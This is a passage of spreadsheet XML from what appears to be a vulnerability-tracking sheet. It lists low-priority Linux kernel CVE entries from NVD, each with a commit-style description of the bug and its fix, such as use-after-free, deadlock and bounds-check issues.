      <c r="N698" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O698" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P698" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q698" s="5" t="inlineStr"/>
      <c r="R698" s="5" t="inlineStr"/>
      <c r="S698" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
HID: logitech-hidpp: Fix FF device cleanup on init failure
hidpp_ff_init() creates the input force-feedback device with
input_ff_create(), then allocates the HID++ FF private data,
effect ID array, and workqueue.
If any of those allocations fail after input_ff_create() succeeds,
the function returns an error without destroying the FF device.
Add an unwind path that frees the private allocations made by
hidpp_ff_init() and calls input_ff_destroy() for failures after
input_ff_create() succeeds.</t>
        </is>
      </c>
      <c r="T698" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90330</t>
        </is>
      </c>
    </row>
    <row r="699">
      <c r="A699" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B699" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C699" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90331</t>
        </is>
      </c>
      <c r="D699" s="5" t="inlineStr"/>
      <c r="E699" s="5" t="inlineStr"/>
      <c r="F699" s="5" t="inlineStr"/>
      <c r="G699" s="5" t="inlineStr"/>
      <c r="H699" s="5" t="inlineStr"/>
      <c r="I699" s="5" t="inlineStr"/>
      <c r="J699" s="5" t="inlineStr"/>
      <c r="K699" s="5" t="inlineStr"/>
      <c r="L699" s="5" t="inlineStr"/>
      <c r="M699" s="5" t="inlineStr"/>
      <c r="N699" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O699" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P699" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q699" s="5" t="inlineStr"/>
      <c r="R699" s="5" t="inlineStr"/>
      <c r="S699" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
HID: asus: refactor the two workqueues and init sequence
Multiple issues have been found within the hid-asus driver:
- unchecked size in asus_raw_event()
- unclean teardown of asus_probe on failure
- possible use-after-free in asus_probe
- multiple workqueue used for jobs where one was enough
- sleeping calls in atomic context
- packets of incorrect size being sent to the keyboard controller
Join the two workqueues into one reusing the stopping mechanism
of the brightness workqueue, use the joined workqueue to also
move the asus_wmi_send_event() sleeping call away from atomic
context and add a size check in asus_raw_event().</t>
        </is>
      </c>
      <c r="T699" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90331</t>
        </is>
      </c>
    </row>
    <row r="700">
      <c r="A700" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B700" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C700" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90332</t>
        </is>
      </c>
      <c r="D700" s="5" t="inlineStr"/>
      <c r="E700" s="5" t="inlineStr"/>
      <c r="F700" s="5" t="inlineStr"/>
      <c r="G700" s="5" t="inlineStr"/>
      <c r="H700" s="5" t="inlineStr"/>
      <c r="I700" s="5" t="inlineStr"/>
      <c r="J700" s="5" t="inlineStr">
        <is>
          <t>sap</t>
        </is>
      </c>
      <c r="K700" s="5" t="inlineStr"/>
      <c r="L700" s="5" t="inlineStr"/>
      <c r="M700" s="5" t="inlineStr"/>
      <c r="N700" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O700" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P700" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q700" s="5" t="inlineStr"/>
      <c r="R700" s="5" t="inlineStr"/>
      <c r="S700" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
PCI: dwc: ep: Flush cached MSI write before unmapping the iATU
The MSI-X path already flushes any posted MSI-X write before tearing down
its iATU mapping. That was added by commit c22533c66cca ("PCI: dwc: ep:
Flush MSI-X write before unmapping its ATU entry") to make sure the write
reaches the Root Complex before the outbound window that translates it
disappears.
The MSI path has the same problem but no equivalent flush. When the
Endpoint driver caches an MSI target address and later observes that the
Root Complex has changed it, dw_pcie_ep_raise_msi_irq() unmaps the existing
iATU entry and reprograms it for the new address. Between the last MSI
writel() and the unmap there may still be a posted write sitting in the
fabric, and unmapping the iATU entry can drop or misroute that write.
Fix this by reading back from the mapped MSI window before the unmap. The
readback drains any posted MSI writes through the same iATU entry that
mapped them, which is the same logic the MSI-X path uses.
[mani: commit log]</t>
        </is>
      </c>
      <c r="T700" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90332</t>
        </is>
      </c>
    </row>
    <row r="701">
      <c r="A701" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B701" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C701" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90333</t>
        </is>
      </c>
      <c r="D701" s="5" t="inlineStr"/>
      <c r="E701" s="5" t="inlineStr"/>
      <c r="F701" s="5" t="inlineStr"/>
      <c r="G701" s="5" t="inlineStr"/>
      <c r="H701" s="5" t="inlineStr"/>
      <c r="I701" s="5" t="inlineStr"/>
      <c r="J701" s="5" t="inlineStr"/>
      <c r="K701" s="5" t="inlineStr"/>
      <c r="L701" s="5" t="inlineStr"/>
      <c r="M701" s="5" t="inlineStr"/>
      <c r="N701" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O701" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P701" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q701" s="5" t="inlineStr"/>
      <c r="R701" s="5" t="inlineStr"/>
      <c r="S701" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
dm-integrity: replace forgeable discard filler with a keyed sector marker
The discard-block check in dm_integrity_rw_tag() treats a stored tag
of all 0xf6 bytes (DISCARD_FILLER) as proof a block was discarded and
skips HMAC verification. allow_discards is only accepted in
dm-integrity's standalone mode. An attacker with raw write access to
the backing device, but without the integrity key, can stamp any block
with an all-0xf6 tag and have it served as authentic.
Add a new "allow_discards_keyed" target argument that marks discarded
blocks with a keyed checksum of (salt || sector) instead, computed by
integrity_discard_checksum().</t>
        </is>
      </c>
      <c r="T701" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90333</t>
        </is>
      </c>
    </row>
    <row r="702">
      <c r="A702" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B702" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C702" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90334</t>
        </is>
      </c>
      <c r="D702" s="5" t="inlineStr"/>
      <c r="E702" s="5" t="inlineStr"/>
      <c r="F702" s="5" t="inlineStr"/>
      <c r="G702" s="5" t="inlineStr"/>
      <c r="H702" s="5" t="inlineStr"/>
      <c r="I702" s="5" t="inlineStr"/>
      <c r="J702" s="5" t="inlineStr"/>
      <c r="K702" s="5" t="inlineStr"/>
      <c r="L702" s="5" t="inlineStr"/>
      <c r="M702" s="5" t="inlineStr"/>
      <c r="N702" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O702" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P702" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q702" s="5" t="inlineStr"/>
      <c r="R702" s="5" t="inlineStr"/>
      <c r="S702" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
tty: clear cdev pointer after cdev_add() failure
tty_cdev_add() drops the cdev reference when cdev_add() fails, but
leaves driver-&gt;cdevs[index] pointing to freed memory.
tty_unregister_device() later passes that stale pointer to cdev_del(),
causing a use-after-free.
Clear the slot after dropping the reference.</t>
        </is>
      </c>
      <c r="T702" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90334</t>
        </is>
      </c>
    </row>
    <row r="703">
      <c r="A703" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B703" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C703" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90335</t>
        </is>
      </c>
      <c r="D703" s="5" t="inlineStr"/>
      <c r="E703" s="5" t="inlineStr"/>
      <c r="F703" s="5" t="inlineStr"/>
      <c r="G703" s="5" t="inlineStr"/>
      <c r="H703" s="5" t="inlineStr"/>
      <c r="I703" s="5" t="inlineStr"/>
      <c r="J703" s="5" t="inlineStr"/>
      <c r="K703" s="5" t="inlineStr"/>
      <c r="L703" s="5" t="inlineStr"/>
      <c r="M703" s="5" t="inlineStr"/>
      <c r="N703" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O703" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P703" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q703" s="5" t="inlineStr"/>
      <c r="R703" s="5" t="inlineStr"/>
      <c r="S703" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
tty: skip cdev_del() when no cdev is registered
TTY device registration can fail before a cdev is allocated.
Serial core keeps the port so setserial can still use it, and later
removal passes the NULL cdev slot to cdev_del(), causing a NULL-pointer
dereference.
Only delete the cdev when the slot is not NULL.</t>
        </is>
      </c>
      <c r="T703" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90335</t>
        </is>
      </c>
    </row>
    <row r="704">
      <c r="A704" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B704" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C704" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90336</t>
        </is>
      </c>
      <c r="D704" s="5" t="inlineStr"/>
      <c r="E704" s="5" t="inlineStr"/>
      <c r="F704" s="5" t="inlineStr"/>
      <c r="G704" s="5" t="inlineStr"/>
      <c r="H704" s="5" t="inlineStr"/>
      <c r="I704" s="5" t="inlineStr"/>
      <c r="J704" s="5" t="inlineStr"/>
      <c r="K704" s="5" t="inlineStr"/>
      <c r="L704" s="5" t="inlineStr"/>
      <c r="M704" s="5" t="inlineStr"/>
      <c r="N704" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O704" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P704" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q704" s="5" t="inlineStr"/>
      <c r="R704" s="5" t="inlineStr"/>
      <c r="S704" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
serial: core: clear freed pointers on uart_register_driver() failure
uart_register_driver() leaves drv-&gt;state pointing to freed memory when
tty_alloc_driver() fails. If tty_register_driver() fails, drv-&gt;tty_driver
also retains a pointer after its reference is dropped.
Drivers that use drv-&gt;state as an "already registered" flag can then skip
registration on the next probe and pass the freed state to
uart_add_one_port().
This issue was found with failslab on QEMU's raspi1ap board by
failing registration and binding the PL011 port again.
Clear both pointers on their failure paths, as uart_unregister_driver()
already does.</t>
        </is>
      </c>
      <c r="T704" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90336</t>
        </is>
      </c>
    </row>
    <row r="705">
      <c r="A705" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B705" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C705" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90337</t>
        </is>
      </c>
      <c r="D705" s="5" t="inlineStr"/>
      <c r="E705" s="5" t="inlineStr"/>
      <c r="F705" s="5" t="inlineStr"/>
      <c r="G705" s="5" t="inlineStr"/>
      <c r="H705" s="5" t="inlineStr"/>
      <c r="I705" s="5" t="inlineStr"/>
      <c r="J705" s="5" t="inlineStr"/>
      <c r="K705" s="5" t="inlineStr"/>
      <c r="L705" s="5" t="inlineStr"/>
      <c r="M705" s="5" t="inlineStr"/>
      <c r="N705" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O705" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P705" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q705" s="5" t="inlineStr"/>
      <c r="R705" s="5" t="inlineStr"/>
      <c r="S705" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
serial: core: do fallible allocations before the console can be registered
serial_core_add_one_port() allocates uport-&gt;tty_groups after
uart_configure_port(), which may register the console. If the allocation
fails, the driver unwinds the port while its console remains registered.
The earlier uport-&gt;name allocation has a related failure path that leaves
state-&gt;uart_port linked to a port being freed.
Failslab reproduced a NULL dereference in PL011 console output and a KASAN
use-after-free in i.MX console output after failed binds.
Allocate the name and tty_groups before linking the port and configuring
it. Reserve space for the optional driver attribute group because
config_port() may populate uport-&gt;attr_group during configuration.</t>
        </is>
      </c>
      <c r="T705" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90337</t>
        </is>
      </c>
    </row>
    <row r="706">
      <c r="A706" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B706" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C706" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90338</t>
        </is>
      </c>
      <c r="D706" s="5" t="inlineStr"/>
      <c r="E706" s="5" t="inlineStr"/>
      <c r="F706" s="5" t="inlineStr"/>
      <c r="G706" s="5" t="inlineStr"/>
      <c r="H706" s="5" t="inlineStr"/>
      <c r="I706" s="5" t="inlineStr"/>
      <c r="J706" s="5" t="inlineStr"/>
      <c r="K706" s="5" t="inlineStr"/>
      <c r="L706" s="5" t="inlineStr"/>
      <c r="M706" s="5" t="inlineStr"/>
      <c r="N706" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O706" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P706" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q706" s="5" t="inlineStr"/>
      <c r="R706" s="5" t="inlineStr"/>
      <c r="S706" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
serial: amba-pl011: keep console clock enabled for atomic writes
pl011_console_write_atomic() runs from nbcon atomic context, where
sleeping is not allowed. It calls clk_enable(), which takes the common-clk
enable_lock. Under PREEMPT_RT that is a sleeping lock:
clk_enable_lock() first tries spin_trylock_irqsave(), but on contention
falls back to spin_lock_irqsave(). Therefore, an atomic-context printk on
an RT kernel with a clk-backed pl011 can trip:
  BUG: sleeping function called from invalid context at spinlock_rt.c:48
    __might_resched from rt_spin_lock
    rt_spin_lock from clk_enable_lock
    clk_enable_lock from clk_enable
    clk_enable from pl011_console_write_atomic
    ... from vprintk_emit
This was found and reproduced on PREEMPT_RT. Arm32 and arm64 DT SoCs are
affected; arm64 SBSA/ACPI has no clk, so clk_enable(NULL) short-circuits
before the lock. In addition, write_atomic() may be invoked from NMI
context and is documented to avoid locking. Removing clk_enable() from
the callback also avoids a potentially unsafe NMI acquisition of the
common-clock enable_lock.
An nbcon atomic-capable console must be printable from any context, so
the clock cannot be gated between writes. Enable the clock while the
console is available for output: use clk_prepare_enable() in
pl011_console_setup(), release it via clk_disable_unprepare() in the
console .exit() callback, and drop the per-write clk_enable()/clk_disable()
pairs from write_atomic() and write_thread().
When printk suspends consoles, drop the reference after
uart_suspend_port() stops console access and restore it before
uart_resume_port() -- but only if suspend actually marked the port
suspended (a wake-capable tty stays running and must keep its clock), and
keep it when console_suspend_enabled is false so no_console_suspend works.
The active power cost of keeping the clock enabled is platform-dependent:
none where the UART clock is a fixed always-on oscillator, real where it
is a gateable clock branch, which then cannot be gated (nor possibly can
its parent clocks) while the console is available for output. When serial
core actually suspends the port, the reference is released so the clock
provider can gate the clock tree.</t>
        </is>
      </c>
      <c r="T706" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90338</t>
        </is>
      </c>
    </row>
    <row r="707">
      <c r="A707" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B707" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C707" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90339</t>
        </is>
      </c>
      <c r="D707" s="5" t="inlineStr"/>
      <c r="E707" s="5" t="inlineStr"/>
      <c r="F707" s="5" t="inlineStr"/>
      <c r="G707" s="5" t="inlineStr"/>
      <c r="H707" s="5" t="inlineStr"/>
      <c r="I707" s="5" t="inlineStr"/>
      <c r="J707" s="5" t="inlineStr"/>
      <c r="K707" s="5" t="inlineStr"/>
      <c r="L707" s="5" t="inlineStr"/>
      <c r="M707" s="5" t="inlineStr"/>
      <c r="N707" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O707" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P707" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q707" s="5" t="inlineStr"/>
      <c r="R707" s="5" t="inlineStr"/>
      <c r="S707" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
powerpc/syscall: Fix syscall skip handling for seccomp and ptrace
After enabling GENERIC_ENTRY on PowerPC, syscall_enter_from_user_mode()
returns -1 as a sentinel to signal that seccomp or ptrace has intercepted
the syscall and already set a return value via syscall_set_return_value().
system_call_exception() was not handling this sentinel, and since -1UL
is &gt;= NR_syscalls, the code fell into the out-of-range path and returned
-ENOSYS, overwriting the errno already placed in regs-&gt;gpr[3].
The naive fix of checking r0 == -1L before the NR_syscalls bounds check
is ambiguous: a user legitimately calling syscall(-1) also produces r0 ==
-1L, and a tracer intercepting such a call would have its injected return
value silently discarded.
Fix this by introducing a thread flag that is set whenever
syscall_set_return_value() explicitly updates the return value. In
system_call_exception(), check and clear this flag before dispatching
the syscall, and return the preset value directly when it is present.
This ensures that an explicitly supplied return value always suppresses
syscall execution, regardless of the syscall number.
This handles all seccomp actions correctly:
  - SECCOMP_RET_ERRNO, SECCOMP_RET_TRACE (no tracer), SECCOMP_RET_USER_NOTIF:
    all call syscall_set_return_value(), flag is set, injected value returned.
  - SECCOMP_RET_TRAP, SECCOMP_RET_KILL: call syscall_rollback() and deliver
    a signal; flag is not set, but the process is dying so the return value
    is irrelevant.
The fix covers both ppc32 and ppc64 with no #ifdefs.</t>
        </is>
      </c>
      <c r="T707" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90339</t>
        </is>
      </c>
    </row>
    <row r="708">
      <c r="A708" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B708" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C708" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90340</t>
        </is>
      </c>
      <c r="D708" s="5" t="inlineStr"/>
      <c r="E708" s="5" t="inlineStr"/>
      <c r="F708" s="5" t="inlineStr"/>
      <c r="G708" s="5" t="inlineStr"/>
      <c r="H708" s="5" t="inlineStr"/>
      <c r="I708" s="5" t="inlineStr"/>
      <c r="J708" s="5" t="inlineStr"/>
      <c r="K708" s="5" t="inlineStr"/>
      <c r="L708" s="5" t="inlineStr"/>
      <c r="M708" s="5" t="inlineStr"/>
      <c r="N708" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O708" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P708" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q708" s="5" t="inlineStr"/>
      <c r="R708" s="5" t="inlineStr"/>
      <c r="S708" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
pinctrl: generic: free maps on pinctrl_generic_to_map() failure
pinctrl_generic_to_map() parses DT configuration and allocates pinctrl
maps via pinctrl_utils_reserve_map().
If subsequent steps (such as pinctrl_utils_add_map_mux(),
pinctrl_generic_add_group(), pinconf_generic_parse_dt_config(), or
pinctrl_utils_add_map_configs()) return an error, *maps may contain
partially allocated map entries. Returning the error directly without
freeing *maps leaks the allocated mapping memory across all drivers
that rely on pinctrl_generic_to_map().
Fix this by calling pinctrl_utils_free_map() and resetting *maps,
*num_maps, and *num_reserved_maps in the error path of
pinctrl_generic_to_map().</t>
        </is>
      </c>
      <c r="T708" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90340</t>
        </is>
      </c>
    </row>
    <row r="709">
      <c r="A709" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B709" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C709" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90341</t>
        </is>
      </c>
      <c r="D709" s="5" t="inlineStr"/>
      <c r="E709" s="5" t="inlineStr"/>
      <c r="F709" s="5" t="inlineStr"/>
      <c r="G709" s="5" t="inlineStr"/>
      <c r="H709" s="5" t="inlineStr"/>
      <c r="I709" s="5" t="inlineStr"/>
      <c r="J709" s="5" t="inlineStr"/>
      <c r="K709" s="5" t="inlineStr"/>
      <c r="L709" s="5" t="inlineStr"/>
      <c r="M709" s="5" t="inlineStr"/>
      <c r="N709" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O709" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P709" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q709" s="5" t="inlineStr"/>
      <c r="R709" s="5" t="inlineStr"/>
      <c r="S709" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
firmware: coreboot: Validate table bounds
The existing coreboot_table_populate() bounds checks limit individual
entries to the mapped length.  However, coreboot_table_probe() replaces
the platform resource length with header and table sizes supplied by
firmware before mapping the full table.
A malformed table can overflow the 32-bit size addition or advertise an
extent beyond the resource, causing the driver to map and parse memory
outside the resource.  A resource shorter than the fixed header is also
mapped as though it contained a complete header.
Reject resources shorter than the fixed header.  After validating the
signature, require a complete header, calculate the advertised extent
with overflow checking, and reject extents beyond the resource before
remapping the table.</t>
        </is>
      </c>
      <c r="T709" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90341</t>
        </is>
      </c>
    </row>
    <row r="710">
      <c r="A710" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B710" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C710" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90342</t>
        </is>
      </c>
      <c r="D710" s="5" t="inlineStr"/>
      <c r="E710" s="5" t="inlineStr"/>
      <c r="F710" s="5" t="inlineStr"/>
      <c r="G710" s="5" t="inlineStr"/>
      <c r="H710" s="5" t="inlineStr"/>
      <c r="I710" s="5" t="inlineStr"/>
      <c r="J710" s="5" t="inlineStr"/>
      <c r="K710" s="5" t="inlineStr"/>
      <c r="L710" s="5" t="inlineStr"/>
      <c r="M710" s="5" t="inlineStr"/>
      <c r="N710" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O710" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P710" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q710" s="5" t="inlineStr"/>
      <c r="R710" s="5" t="inlineStr"/>
      <c r="S710" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
bpf: Fix mmap_lock deadlock on arena lock failure
Reported by the Sashiko AI review.
arena_vm_fault() returns VM_FAULT_RETRY when it can't take
arena-&gt;spinlock, but it never took mmap_lock. The fault path assumes a
VM_FAULT_RETRY handler already dropped mmap_lock and re-takes it on the
retry, so mmap_lock gets taken twice and can deadlock:
	do_user_addr_fault()
	{
		fault = handle_mm_fault(...);   // calls arena_vm_fault()
		if (fault &amp; VM_FAULT_RETRY)
			goto retry;   // re-locks mmap_lock
		mmap_read_unlock(mm);
	}
Return VM_FAULT_SIGBUS instead, for two reasons:
1. We could keep VM_FAULT_RETRY, but then we'd have to drop the fault
   lock first and cap the retry ourselves, the way __folio_lock_or_retry()
   does.
2. A failed raw_res_spin_lock_irqsave() already means a possible deadlock
   was detected, so retrying just hits the same lock again.
So returning VM_FAULT_RETRY here is overkill.</t>
        </is>
      </c>
      <c r="T710" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90342</t>
        </is>
      </c>
    </row>
    <row r="711">
      <c r="A711" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B711" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C711" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90343</t>
        </is>
      </c>
      <c r="D711" s="5" t="inlineStr"/>
      <c r="E711" s="5" t="inlineStr"/>
      <c r="F711" s="5" t="inlineStr"/>
      <c r="G711" s="5" t="inlineStr"/>
      <c r="H711" s="5" t="inlineStr"/>
      <c r="I711" s="5" t="inlineStr"/>
      <c r="J711" s="5" t="inlineStr"/>
      <c r="K711" s="5" t="inlineStr"/>
      <c r="L711" s="5" t="inlineStr"/>
      <c r="M711" s="5" t="inlineStr"/>
      <c r="N711" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O711" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P711" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q711" s="5" t="inlineStr"/>
      <c r="R711" s="5" t="inlineStr"/>
      <c r="S711" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
wifi: cfg80211: stop PMSR before P2P and NAN teardown
PMSR request teardown must abort active measurements while the
wireless_dev is still present in the driver. cfg80211_leave_locked() and
cfg80211_stop_pd() already do this before invoking the driver's stop
callback, but cfg80211_stop_p2p_device() and cfg80211_stop_nan() do not.
Those helpers are also called directly by nl80211, rfkill shutdown, and
wireless_dev unregister paths. If one of these paths stops a P2P device
or NAN interface with a pending request, it removes the mac80211
subinterface from the driver first. Subsequent request cleanup cannot
reach the lower driver's abort callback, but cfg80211 frees the request
regardless. Driver state can then retain a stale request and use it when
it later reports a result.
Call cfg80211_pmsr_wdev_down() before stopping the P2P device or NAN
interface. This keeps lower-driver request state and cfg80211 request
ownership in sync for all of the helpers' callers.</t>
        </is>
      </c>
      <c r="T711" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90343</t>
        </is>
      </c>
    </row>
    <row r="712">
      <c r="A712" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B712" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C712" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90344</t>
        </is>
      </c>
      <c r="D712" s="5" t="inlineStr"/>
      <c r="E712" s="5" t="inlineStr"/>
      <c r="F712" s="5" t="inlineStr"/>
      <c r="G712" s="5" t="inlineStr"/>
      <c r="H712" s="5" t="inlineStr"/>
      <c r="I712" s="5" t="inlineStr"/>
      <c r="J712" s="5" t="inlineStr"/>
      <c r="K712" s="5" t="inlineStr"/>
      <c r="L712" s="5" t="inlineStr"/>
      <c r="M712" s="5" t="inlineStr"/>
      <c r="N712" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O712" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P712" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q712" s="5" t="inlineStr"/>
      <c r="R712" s="5" t="inlineStr"/>
      <c r="S712" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
